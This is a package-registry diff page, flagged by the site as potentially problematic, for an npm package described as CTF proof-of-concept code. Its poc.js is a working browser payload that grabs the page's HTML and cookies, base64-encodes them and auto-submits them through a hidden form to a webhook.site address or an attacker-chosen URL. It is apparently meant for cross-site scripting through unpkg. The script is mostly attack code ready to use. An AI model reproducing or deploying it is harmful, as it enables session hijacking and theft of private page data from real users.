@milymilo/ctf-poc-unpkg 1.0.5

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of @milymilo/ctf-poc-unpkg might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +5 -0
  2. package/package.json +11 -0
  3. package/poc.js +38 -0
package/README.md ADDED
@@ -0,0 +1,5 @@
1
+ # DO NOT USE
2
+
3
+ This package is a PoC code for a CTF challenge.
4
+
5
+ It's nothing interesting, and shouldn't be uploaded anywhere.
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "@milymilo/ctf-poc-unpkg",
3
+ "version": "1.0.5",
4
+ "description": "This package is a PoC code for a CTF challenge.",
5
+ "main": "poc.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
11
+ }
package/poc.js ADDED
@@ -0,0 +1,38 @@
1
+ const vForm = (action, method, fields) => {
2
+ const form = document.createElement('form')
3
+ form.setAttribute('hidden', 'true')
4
+ form.setAttribute('action', action)
5
+ form.setAttribute('method', method)
6
+
7
+ fields.forEach(field => {
8
+ const element = document.createElement('input')
9
+ element.setAttribute('type', field.type || 'text')
10
+ element.setAttribute('name', field.name || '')
11
+ element.setAttribute('value', field.value || '')
12
+ form.appendChild(element)
13
+ })
14
+
15
+ document.body.appendChild(form)
16
+ form.submit()
17
+ }
18
+
19
+ (async () => {
20
+ const params = new URLSearchParams(window.location.search);
21
+
22
+ const options = {
23
+ method: params.get("m") || "POST",
24
+ target: params.get("t") || "https://webhook.site/c1289a5d-3cd8-4178-9f11-678cc96f225a",
25
+ }
26
+
27
+ if (!options.target)
28
+ return
29
+
30
+ const data = btoa(JSON.stringify({
31
+ document: document.documentElement.innerHTML,
32
+ cookies: document.cookie
33
+ }));
34
+
35
+ vForm(options.target, options.method, [
36
+ { name: 'data', value: data },
37
+ ]);
38
+ })()